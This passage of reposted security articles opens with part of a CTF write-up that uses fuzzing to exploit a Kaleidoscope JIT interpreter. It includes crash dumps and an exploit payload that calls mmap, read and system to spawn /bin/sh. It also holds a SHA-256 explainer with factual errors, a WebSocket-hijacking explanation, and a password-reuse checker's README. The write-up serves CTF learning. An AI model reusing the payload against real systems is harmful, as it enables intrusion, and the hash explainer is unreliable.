0x55555567aa60 ◂— 0x0 02:0010│ 0x7fffffffd670 ◂— 0x0 ... ↓ ─────────────────────────────────[ BACKTRACE ]────────────────────────────────── ► f 0 7ffff35ede97 raise+199 f 1 7ffff35ef801 abort+321 f 2 7ffff3fef242 f 3 7ffff3ffae86 f 4 7ffff3ffaed1 f 5 7ffff3ffb105 f 6 7ffff3feeee1 f 7 55555555eb68 f 8 55555555eb68 f 9 55555555eb68 f 10 55555555eb68 pwndbg> bt #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51 #1 0x00007ffff35ef801 in __GI_abort () at abort.c:79 #2 0x00007ffff3fef242 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #3 0x00007ffff3ffae86 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #4 0x00007ffff3ffaed1 in std::terminate() () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #5 0x00007ffff3ffb105 in __cxa_throw () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #6 0x00007ffff3feeee1 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #7 0x000055555555eb68 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_construct<char*> (this=<optimized out>, __beg=0x6 <error: Cannot access memory at address 0x6>, __end=<optimized out>) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/basic_string.tcc:219 #8 std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_construct_aux<char*> (this=<optimized out>, __beg=0x6 <error: Cannot access memory at address 0x6>, __end=<optimized out>) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/basic_string.h:236 #9 std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_construct<char*> (this=<optimized out>, __beg=0x6 <error: Cannot access memory at address 0x6>, __end=<optimized out>) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/basic_string.h:255 #10 std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::basic_string (this=<optimized out>, __str=...) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/basic_string.h:440 #11 std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*>::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, 0ul>(std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>&, std::tuple<>&, std::_Index_tuple<0ul>, std::_Index_tuple<>) (this=0x55555569ec30, __tuple1=..., __tuple2=...) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/tuple:1651 #12 std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*>::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>(std::piecewise_construct_t, std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>, std::tuple<>) (this=0x55555569ec30, __first=..., __second=...) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/tuple:1639 #13 __gnu_cxx::new_allocator<std::_Rb_tree_node<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> > >::construct<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*>, std::piecewise_construct_t const&, std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>, std::tuple<> >(std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*>*, std::piecewise_construct_t const&, std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>&&, std::tuple<>&&) (__p=0x55555569ec30, __args=..., this=<optimized out>, __args=..., __args=...) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/ext/new_allocator.h:136 #14 std::allocator_traits<std::allocator<std::_Rb_tree_node<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> > > >::construct<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*>, std::piecewise_construct_t const&, std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>, std::tuple<> >(std::allocator<std::_Rb_tree_node<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> > >&, std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*>*, std::piecewise_construct_t const&, std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>&&, std::tuple<>&&) (__p=0x55555569ec30, __args=..., __a=..., __args=..., __args=...) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/alloc_traits.h:475 #15 std::_Rb_tree<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*>, std::_Select1st<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> >, std::less<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >, std::allocator<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> > >::_M_construct_node<std::piecewise_construct_t const&, std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>, std::tuple<> >(std::_Rb_tree_node<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> >*, std::piecewise_construct_t const&, std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>&&, std::tuple<>&&) (this=0x5555555694c8 <NamedValues[abi:cxx11]>, __node=0x55555569ec10, __args=..., __args=..., __args=...) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/stl_tree.h:626 #16 std::_Rb_tree<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*>, std::_Select1st<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> >, std::less<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >, std::allocator<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> > >::_M_create_node<std::piecewise_construct_t const&, std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>, std::tuple<> >(std::piecewise_construct_t const&, std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>&&, std::tuple<>&&) (this=0x5555555694c8 <NamedValues[abi:cxx11]>, __args=..., __args=..., __args=...) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/stl_tree.h:643 #17 std::_Rb_tree<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*>, std::_Select1st<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> >, std::less<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >, std::allocator<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> > >::_M_emplace_hint_unique<std::piecewise_construct_t const&, std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>, std::tuple<> >(std::_Rb_tree_const_iterator<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> >, std::piecewise_construct_t const&, std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>&&, std::tuple<>&&) (this=0x5555555694c8 <NamedValues[abi:cxx11]>, __pos={ first = <incomplete type>, second = 0x0 }, __args=..., __args=..., __args=...) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/stl_tree.h:2398 #18 0x000055555555e97d in std::map<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, llvm::AllocaInst*, std::less<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >, std::allocator<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> > >::operator[] (this=<optimized out>, __k=...) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/stl_map.h:493 #19 0x00005555555612dc in (anonymous namespace)::BinaryExprAST::codegen (this=0x555555689010) at toy.cpp:781 #20 0x000055555555c6d9 in (anonymous namespace)::FunctionAST::codegen (this=0x555555638840) at toy.cpp:1085 #21 0x000055555555a767 in HandleTopLevelExpression () at toy.cpp:1164 #22 MainLoop () at toy.cpp:1209 #23 main () at toy.cpp:1263 #24 0x00007ffff35d0b97 in __libc_start_main (main=0x55555555a240 <main()>, argc=1, argv=0x7fffffffdee8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffded8) at ../csu/libc-start.c:310 #25 0x0000555555559c4a in _start () I then went to dinner and some really interesting crashes was found before I came back. The fuzzer reports these inputs lead to crashes, but the binary did not crash at all in dry run. matthew@matthew-MS-7A37 ~/L/fuzz> cat c5 def fib(x) if x < 3 then 1 else 526142246948557=666 fib(40) $IF8׆FA]V_13X9`Z^9_O2ر/#nϰ'ӟ]* O-w ff4QjW={%IT(<V['!]h_2 ޒ*`-KyrCzʉB8Cl=}_F85&ЅNQ-O}/8 *ŋyG:~V$5917384075431139189gG ^ggXX%KTY១R| )"319Oqy` {&!M?Z-Bz X >@YAyd(9kG9Dž޹0)dL&TBeDjח@3g3N,Okrvz8b[QRs U,( >m@.*ou3\w;߳^U C}5Ttrz7217830875066176221-+\I f⏎ matthew@matthew-MS-7A37 ~/L/fuzz> cat c5 | ./kaleidoscope ready> ready> Error: Unknown variable name ready> LLVM ERROR: Program used external function 'fib' which could not be resolved! The output was interesting though, it said the external function “fib” could not be resolved. If you compare the binary code with the original source code, you can see that there was an extern keyword in the source. However the handler was disabled in this challenge, it will say “No extern function” if you try to use extern keyword. { if ( CurTok != 0xFFFFFFFD ) goto LABEL_30; fwrite("No extern function!!!\n", 0x16uLL, 1uLL, *v3); CurTok = gettok(); CurTok = gettok(); LABEL_18: CurTok = gettok(); } Then I search the string Program used external function 'fib' which could not be resolved! in this binary but find nothing. However, this message was stared by a tag LLVM ERROR, did that mean the string located at the llvm library? matthew@matthew-MS-7A37 ~/L/fuzz> strings /usr/lib/x86_64-linux-gnu/libLLVM-6.0.so.1 | grep "Program used external" Program used external function ' YES! Analysis Consider the logic behind this test case, the binary have finished the parsing job and pass the function name to libLLVM, libLLVM get the function name and try to resolve it from libc. If we search this info in the source of llvm, we can see it was invoked by RTDyldMemoryManager::getPointerToNamedFunction, see https://github.com/llvm-mirror/llvm/blob/8b8f8d0ad8a1f837071ccb39fb96e44898350070/lib/ExecutionEngine/RuntimeDyld/RTDyldMemoryManager.cpp#L290. Then I thought maybe we can call the libc functions directly in same manner. I changed the fib to puts, loaded the binary into gdb and read the input. I also set a breakpoint at puts, it did stop at the call. LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────────────[ REGISTERS ]─────────────────────────────────────── RAX 0x7ffff36899c0 (puts) ◂— push r13 RBX 0x7ffff7ff6000 ◂— push rax RCX 0x3 RDX 0x55555556a010 ◂— 0x605070607050307 RDI 0x28 RSI 0x55555556a018 ◂— 0x607050702070606 R8 0x8 R9 0x1 R10 0x555555638568 —▸ 0x5555555d4f00 —▸ 0x5555555b99f0 ◂— 0x555500000000 R11 0x88 R12 0x7ffff39f5840 (stderr) —▸ 0x7ffff39f5680 (_IO_2_1_stderr_) ◂— 0xfbad2887 R13 0x555555564eb8 ◂— jb 0x555555564f1f /* 'ready> ' */ R14 0x7fffffffdd40 —▸ 0x7ffff7ff6000 ◂— push rax R15 0x7fffffffddc0 ◂— 0x0 RBP 0x7ffff39f5680 (_IO_2_1_stderr_) ◂— 0xfbad2887 RSP 0x7fffffffdd08 —▸ 0x7ffff7ff6012 ◂— pop rcx RIP 0x7ffff36899c0 (puts) ◂— push r13 ────────────────────────────────────────[ DISASM ]───────────────────────────────────────── ► 0x7ffff36899c0 <puts> push r13 0x7ffff36899c2 <puts+2> push r12 0x7ffff36899c4 <puts+4> mov r12, rdi 0x7ffff36899c7 <puts+7> push rbp 0x7ffff36899c8 <puts+8> push rbx 0x7ffff36899c9 <puts+9> sub rsp, 8 0x7ffff36899cd <puts+13> call *ABS*+0x9dc70@plt <0x7ffff362a100> 0x7ffff36899d2 <puts+18> mov rbp, qword ptr [rip + 0x36be6f] <0x7ffff39f5848> 0x7ffff36899d9 <puts+25> mov rbx, rax 0x7ffff36899dc <puts+28> mov eax, dword ptr [rbp] 0x7ffff36899df <puts+31> mov rdi, rbp ─────────────────────────────────────────[ STACK ]───────────────────────────────────────── 00:0000│ rsp 0x7fffffffdd08 —▸ 0x7ffff7ff6012 ◂— pop rcx 01:0008│ 0x7fffffffdd10 ◂— 0x0 02:0010│ 0x7fffffffdd18 —▸ 0x55555555b0d4 (main+3732) ◂— mov ecx, eax 03:0018│ 0x7fffffffdd20 —▸ 0x7fffffffdd30 ◂— '__anon_expr' 04:0020│ 0x7fffffffdd28 ◂— 0xb /* '\x0b' */ 05:0028│ 0x7fffffffdd30 ◂— '__anon_expr' 06:0030│ 0x7fffffffdd38 ◂— 0x727078 /* 'xpr' */ 07:0038│ r14 0x7fffffffdd40 —▸ 0x7ffff7ff6000 ◂— push rax ───────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────── ► f 0 7ffff36899c0 puts f 1 7ffff7ff6012 f 2 0 ─────────────────────────────────────────────────────────────────────────────────────────── Breakpoint puts pwndbg> We can see that the first argument $rdi is 0x28=40, that means we can control the argument too. Exploit With the handy arbitrary libc function calling ability, it should be quite straightforward to get a shell. The binary was protected by PIE, so we don’t know any address information initially. My solution is using mmap to get an new region like 0x100000 and use read to load the /bin/sh string into memory. Finally we can call system(0x100000) to get shell. payload = """ def mmap(x y z o p) if x < 3 then 1 else a=666 else 0=666 else b=666 else 0=666 else c=666 mmap(1048576, 4096, 7, 34, 0); """ sla(">", payload) time.sleep(0.5) payload = """ def read(x y z) if m < 3 then 1 else 0=666 def system(x) if m < 3 then 1 else 0=666 read(0, 1048576, 10); system(1048576); """ sla(">", payload) sla(">", "/bin/sh\x00") p.interactive() I spent some time to tune the if-else statements according to the number of arguments to make it accept by the interpreter, but later find it is unnecessary, any function definition with if-else statement will be regard as external function. Wrapup This is the first time I used fuzzing technique to solve a challenge during a CTF. As you can see, this is a promising skill in competition, it can save plenty of time from reverse engineering. In terms of the interpreter pwn challenges, I had came across some like Javascript, Lua (see another writeup at of XNUCA2019), and this Kaleidoscope, many of them were related to the external function calling or, foreign function interface (FFI). So this might be the thing to look at when you meet a interpreter-based pwn challenge. References https://llvm.org/docs/tutorial/BuildingAJIT1.html https://github.com/ghaiklor/llvm-kaleidoscope https://hub.docker.com/r/zjuchenyuan/honggfuzz https://github.com/google/honggfuzz/blob/master/docs/USAGE.md https://llvm.org/docs/tutorial/OCamlLangImpl1.html#the-basic-language http://blog.leanote.com/post/xp0int/%5BPWN%5D-ls-cpt.shao%E3%80%81MF Sursa: http://matshao.com/2019/11/11/Redhat2019-Kaleidoscope/
  8. Breaking Down : SHA-256 Algorithm Looking under the hood and understanding how it works? Aditya Anand Nov 27 · 7 min read Good news folks the article that I wrote on Breaking down: SHA-1 Algorithm has been published on PenTest Magazine’s blog. It is always nice to see your work being recognized and appreciated. I am keeping my articles free for everyone to read as I believe in the “knowledge should be free” motto. Well let’s not dwell into that and get started with the new article. So, few of you who might be following me for some time now must be knowing that this month I have dedicated to writing articles that are purely focused on doing intricate analysis of how the most well known hashing algorithms function and what makes one more complex than the other. Till now the articles i have written in this series are as following. Breaking Down : The series 1. Breaking Down : MD5 Algorithm 2. Breaking Down: SHA-1 Algorithm 3. Breaking Down : SHA-512 Algorithm This is the fourth part of the series where I break down, SHA-256 algorithm. Understanding SHA-256 algorithm will be extremely easy if you know the SHA-512 algorithm already, as there is mere changes in the length of bits here and there as the overall process is the same. If you want you can have a look at my article explaining SHA-512 in detail here. Let’s begin! So, let us first start this by segregating and defining what are the parts of the computation that we need to carry out one after the another. I personally prefer to break it down into five parts, for the ease of understanding. 1. Append : Padding bits First step of our hashing function begins with appending bits to our original message, so that its length will be same to the standard length required for the hash function. To do so we proceed by adding few bits to the message that we have in hand. The number of bits we add is calculated as such so that after addition of these bits the length of the message should be exactly 64 bits less than a multiple of 512. Let me depict it to you in mathematical terms for better understanding. M + P + 64 = n x 512i.e M = length of original message P = padded bits The bits that we append to the message, should begin with ‘1’ and the following bits must be ‘0’ till we are exactly 64 bits less than the multiple of 512. 2. Append : Length bits Now that we have appended our padding bits to the original message we can further go ahead append our length bits which is equivalent to 64 bits, to the overall message to make the entire thing an exact multiple of 512. We know that we need to add 64 more bits, the way to calculate these 64 bits is by calculating the modulo of the original message i.e. the one without the padding, with 2³². The message we obtain we append those length to the padded bits and we get the entire message block, which must be a multiple of 512. 3. Initialize the buffers We have our message block on which we will begin to carry out our computations to figure out the final hash. Before we begin with that I should tell you that we need certain default values to be initialized for the steps that we are going to perform. a = 0x6a09e667 b = 0xbb67ae85 c = 0x3c6ef372 d = 0xa54ff53a e = 0x510e527f f = 0x9b05688c g = 0x1f83d9ab h = 0x5be0cd19 Keep these values in the back of your mind for a while, in the next step everything will be clearly understandable to you. There are more 64 values that need to be kept in mind which will act as keys and are denoted by the word ‘k’. Courtesy - SHA-2 Wikipedia Now let’s get into the part where we utilize these values to compute the hash. 4. Compression Function So, the main part of the hashing algorithm lies in this step. The entire message block that we have ‘n x 512’ bits long is divided into ‘n’ chunks of 512 bits and each of these 512 bits, are then put through 64 rounds of operations and the output obtained is fed as input for the next round of operation. In the image above we can clearly see the 64 rounds of operation that is performed on a 512 bit message. We can observe that two inputs that we send in are W(i) & K(i), for the first 16 rounds we further break down 512 bit message into 16 parts each of 32 bit but after that we need to calculate the value for W(i) at each step. W(i) = Wⁱ⁻¹⁶ + σ⁰ + Wⁱ⁻⁷ + σ¹where, σ⁰ = (Wⁱ⁻¹⁵ ROTR⁷(x)) XOR (Wⁱ⁻¹⁵ ROTR¹⁸(x)) XOR (Wⁱ⁻¹⁵ SHR³(x)) σ¹ = (Wⁱ⁻² ROTR¹⁷(x)) XOR (Wⁱ⁻² ROTR¹⁹(x)) XOR (Wⁱ⁻² SHR¹⁰(x)) ROTRⁿ(x) = Circular right rotation of 'x' by 'n' bits SHRⁿ(x) = Circular right shift of 'x' by 'n' bits Well now that we have a well established method to create the W(i) for any given of the 64 rounds let’s dive in what happens in each of these rounds. Depiction of a single “round” In the image above we can see exactly what happens in each round and now that we have the values and formulas for each of the functions carried out we can perform the entire hashing process. Ch(E, F, G) = (E AND F) XOR ((NOT E) AND G) Ma(A, B, C) = (A AND B) XOR (A AND C) XOR (B AND C) ∑(A) = (A >>> 2) XOR (A >>> 13) XOR (A >>> 22) ∑(E) = (E >>> 6) XOR (E >>> 11) XOR (E >>> 25) + = addition modulo 2³² These are the functions that are performed in each of the 64 rounds that are performed over and over for ‘n’ number of times 5. Output The output from every round acts as an input for the next round and this process keeps on continuing till the last bits of the message remains and the result of the last round for the nᵗʰ part of the message block will give us the result i.e. the hash for the entire message. The length of the output is 256 bits. Conclusion The SHA-256 hashing algorithm is currently one of the most widely used hashing algorithm as it hasn’t been cracked yet and the hashes are calculated quickly in comparison to the other secure hashes like the SHA-512. It is very well established but the industry is trying to slowly move towards the SHA-512 which is more secure as experts claim SHA-256 might be vulnerable very soon. So, let’s have a second look at the entire functioning of the SHA-256 algorithm and allow me to explain the entire thing in a single long paragraph. We calculate the length of the message that needs to be hashed, we then append few bits to the message, starting with ‘1’ and the rest are ‘0’ till the point the message length is exactly 64 bits less than the multiple of 512. We add the remaining 64 bits by calculating the modulo of the original message with 2³². Once, we add the remaining bits the entire message block can be represented as ‘n x 512’ bits. Now, we pass each of these 512 bits into the compression function i.e. the set of 64 rounds of operations where we further divide them into 16 parts each of 32 bits.These 16 parts each of 32 bits acts as input for each round of operation for the first 16 rounds and for the rest of the 48 rounds we have method to calculate the W(i). We also have default values for the buffers and the values of ‘k’ for all the 64 rounds. We can now begin the computation of hashes as we have all the values and formulas required. The hashing process is then carried out on over and over for 64 rounds and then the output of i round works as input for the i+1 round. So the output from the 64ᵗʰ operation of the nᵗʰ round will present us with the output i.e. the hash of the entire message. So that’s the short version of the entire operation that takes place in the SHA-256 algorithm. If you enjoyed it please do clap & let’s collaborate. Get, Set, Hack! Website : aditya12anand.com | Donate : paypal.me/aditya12anand Telegram : https://t.me/aditya12anand Twitter : twitter.com/aditya12anand LinkedIn : linkedin.com/in/aditya12anand/ E-mail : aditya12anand@protonmail.com Follow Infosec Write-ups for more such awesome write-ups. InfoSec Write-ups A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew Written by Aditya Anand CyberSec Professional | Hacker | Developer | Open Source Lover | Website - aditya12anand.com | Donate - paypal.me/aditya12anand Sursa: https://medium.com/bugbountywriteup/breaking-down-sha-256-algorithm-2ce61d86f7a3
  9. Reverse Engineering for Beginners Hey there! If you have been searching for a place to get started with Reverse Engineering and get your hands dirty - you are in the right place Note: the website is displayed optimally on Desktop browsers. Get Started Now! About Sursa: https://www.begin.re/
  10. Hacking WebSocket With Cross-Site WebSocket Hijacking attacks Vickie Li Nov 28 · 5 min read Photo by Thomas Kolnowski on Unsplash The Same-Origin Policy (SOP) is one of the fundamental defences deployed in modern web applications. It restricts how a script from one origin can interact with the resources of a different origin. Last time, we talked about the Same-Origin Policy and how it protects a site’s data from unauthorized access: Hacking the Same-Origin Policy How attackers bypass the fundamental Internet safeguard to read confidential data medium.com However, there are some edge cases that the SOP does not cover, and these can often be exploited by attackers to steal private information. Today, we are going to talk about one of these edge cases: WebSocket connections, and how attackers can hijack WebSocket connections to leak private data. Let’s dive in! What is WebSocket? WebSocket is, like HTTP, a communications protocol that enables interaction between a browser and a web server. The WebSocket protocol allows both servers and browsers to send messages to each other using a single TCP connection. This is very useful when trying to create real-time applications such as online games and live chat. For example, Slack’s web app uses WebSocket connections to sync messages in its chat functionality. In order for a web application to sync in real-time, web servers need to be able to actively push data to its clients. And this is where WebSocket comes in. Traditionally, HTTP only supports client-initiated communications. This means that every time the real-time application needs to be synced (for example, an online game updating its live leaderboard), the client’s browser would need to send an HTTP request to retrieve the data from the server. When an application is constantly doing this type of update, this traditional method incurs a lot of unnecessary overhead and ultimately slows down the application. Whereas the WebSocket protocol solves this problem by creating a persistent connection between the client and the server that allows both client and server-initiated data transfers. During the lifetime of a WebSocket connection, the client and the server are free to exchange any amount of data without incurring the overhead and latency of using traditional HTTP requests. How WebSocket connections are created A WebSocket connection between a client and a server is established through a WebSocket handshake. This process is initiated by the client sending a normal HTTP or HTTPS request to the server with the special header: “Upgrade: websocket”. If the server supports WebSocket connections, it will respond with a 101 status code (Switching Protocols). From that point on, the handshake is complete and both parties are free to send data to the other. Side note: WebSocket uses the ws:// URL scheme, and the wss:// URL scheme for secure connections. The problem with WebSocket As I mentioned in the Same-Origin Policy article, the SOP is a way of preventing unwanted data access from malicious domains. However, the Same-Origin Policy does not apply to WebSocket connections and modern browsers would not prevent data reads on a WebSocket connection across origins. This means that if an attacker can create a WebSocket connection using a victim’s credentials, that connection would have the same access as a legitimate connection, regardless of where the connection is coming from. Cross-Site WebSocket Hijacking (CSWSH) A Cross-Site WebSocket Hijacking attack is essentially a CSRF on a WebSocket handshake. When a user is logged into victim.com in her browser and opens attacker.com in the same browser, attacker.com can try to establish a WebSocket connection to the server of victim.com. Since the user’s browser would automatically send over her credentials with any HTTP/ HTTPS request to victim.com, the WebSocket handshake request initiated by attacker.com would contain the user’s legitimate credentials. This means the resulting the WebSocket connection (created by attacker.com) would have the same level of access as if it originated from vicitm.com. After the WebSocket connection is established, attacker.com can communicate directly to victim.com as a legitimate user. Structure of an attack To carry out the attack, an attacker would create a script that will initiate the WebSocket connection to the victim server. She can then embed that script on a malicious page and trick a user into accessing the page. When the victim accesses the malicious page, her browser will automatically include her cookies into the WebSocket handshake request (since it’s a regular HTTP request). The malicious script crafted by the attacker will now have access to a WebSocket connection created using the victim’s credentials. The impact of Cross-Site WebSocket Hijacking Using a hijacked WebSocket connection, the attacker can now achieve a lot of things: WebSocket CSRF: If the WebSocket communication is used to carry out sensitive, state-changing actions, attackers can use this connection to forge actions on behalf of the user. For example, attackers can post fake messages onto a user’s chat groups. Private data retrieval: If the WebSocket communication can be used to retrieve sensitive information via a client request, attackers can initiate fake requests to retrieve sensitive data belonging to the user. Private data leaks via server messages: Attackers can also simply listen in on server messages and passively collect information leaked from these messages. For example, an attacker can use the connection to eavesdrop on a user’s incoming notifications. How to prevent Cross-Site WebSocket Hijacking In order to prevent Cross-Site WebSocket Hijacking, an application would need to deny WebSocket handshake requests from unknown origins. There are two ways this can be achieved: Check the Origin header: browsers would automatically include an Origin header. This can be used to validate where the handshake request is coming from. When validating the Origin of the request, be sure to use a whitelist of URLs instead of a blacklist, and use a strict and rigorously tested regex expression. Use CSRF tokens for the WebSocket handshake request: applications could also use a randomized token on a WebSocket handshake request and validate it server-side before establishing a WebSocket connection. This way, if an attacker cannot leak or predict the random token, she will not be able to establish the connection. WebSocket is a big part of many modern applications. However, it is often overlooked as a potential attack vector. It is important for developers and pentesters to be aware of this common pitfall and look out for these vulnerabilities before they are exploited in the wild. As always, thanks for reading! The Startup Medium's largest active publication, followed by +532K people. Follow to join our community. Written by Vickie Li Basically a nerd. Studies web security. Stalks great hackers. Creates god awful infographics. https://twitter.com/vickieli7 Sursa: https://medium.com/swlh/hacking-websocket-25d3cba6a4b9
  11. PAF Credentials Checker PCC's aim is to provide a high performing offline tool to easily assess which users are vulnerable to Password Reuse Attacks (a.k.a. Password Stuffing). The output of this tool is usually used to communicate with the vulnerable users to force them to change their password to one that has not leaked online. Features Highlights Only checks the password of internal users matching the IDs in external lists Highly parallel checking of credentials (defaults to 30 goroutines) Supports mixed internal hashing functions, useful if you have multiple hashing schemes Easy to extend and add your own internal hashing schemes Getting Started If you have a working Go environment, building the tool after cloning this repository should be as easy as running: go build The tool can be then launched using this command: ./paf-credentials-checker -creds credentials.txt -outfile cracked.txt leak1.txt [leak2.txt [leakN.txt ...]] You can find some test cases in the test_files directory. The different files on the command line are: credentials.txt contains your internal credentials, with one record per line following this syntax internalID0:InternalID1:mappingID:hashtype:hash:[salt[:salt[:...]] internalID0 and internalID1 are internal identifiers that will be written to the output file. mappingID is an ID that will be used to map the internal user to the external passwords lists hashtype is the short hash type that corresponds to the hashing function that should be used to parse the hash and salts and to check the credentials hash and salts, in the format required by the checking and extracting functions cracked.txt is a csv file in which each password reuse match will appear as a row containing the internalID0,internalID1 of the matched user. This file is being written live, so it will contain duplicates if your leak files contain duplicates. leak.txt is a file in the usual combo list format: mappingID:password Note: Usually the mappingID in the combo lists are usernames, emails or others fields containings PIIs. To avoid processing and storing those extremely sensitive information, a script is available in the importer directory to recreate combo lists files and change the mappingID with a heavily truncated md5 sum (by default first 6 characters of the hex output). Applying the same function to your internal mappingID will allow the matching logic to continue working. Please note that using a truncated hash that short will likely create some false positives (e.g. an internal user being matched to an external one that is not the same), but: this is expected, we want collisions to happen to limit the sensitivity of the information if there is a full false positive (e.g. an internal user matched to another external one that somehow had the same password), then the internal user probably used an extremely common password. Therefore it's not a bad idea to also ask him to change his password... Supported hashing functions In this initial release, only two functions are implemented to showcase the different functionalities. Short ID Verbose ID Function MD5 MD5RAW md5(password) MD5spSHA1sp MD5SaltPreSHA1SaltPre md5(salt1.UPPER(HEX(sha1(salt2.password)))) Adding a new hashing function Here is a todo list to add a new hashing function: Decide on a Short ID, used in your internal credentials file, and a Verbose ID, only used within the tool. Add the Verbose ID to the const list line 14 in credentialChecker.go Add a case in the detectHash function in extractHash.go to map the Short ID to the Verbose ID Create your extraction function in extractHash.go. The purpose of the extraction function is to parse the line from the internal credentials file from the hashtype field until the end and to create a new Hash object containing the proper hashtype (Verbose ID), hash and salts values. Add a case extractTokens function to map your Verbose ID with your new extraction function. Create your checking function in checkHash.go. The purpose of this function is to check a clear text password against the Hash object that was extracted in the previous step. Add a case with the Verbose ID in the function crackHash function in credentialChecker.go to map it to your new checking function Add new unit tests to verify that your extraction and checking functions are working accordingly Motivation While comparing users's passwords against known weak passwords is a best practice, using a massive list containing all the leaked passwords is both impractical if you have a lot of users and a strong hashing function, and also really bad from a user experience point of view as they will struggle to find a password that didn't appear in any breaches. However, relying on a more realistic blacklist of around 10.000 passwords will protect the users against attacker spraying bad passwords at scale but it will not help them in case they are reusing their password on another website that has suffered a breach. In this scenario, an attacker would just need to get those credentials from this third party website leak and test them on your website. If the user used the same password on both services, even if it was a strong password, his account would be at immediate risk of 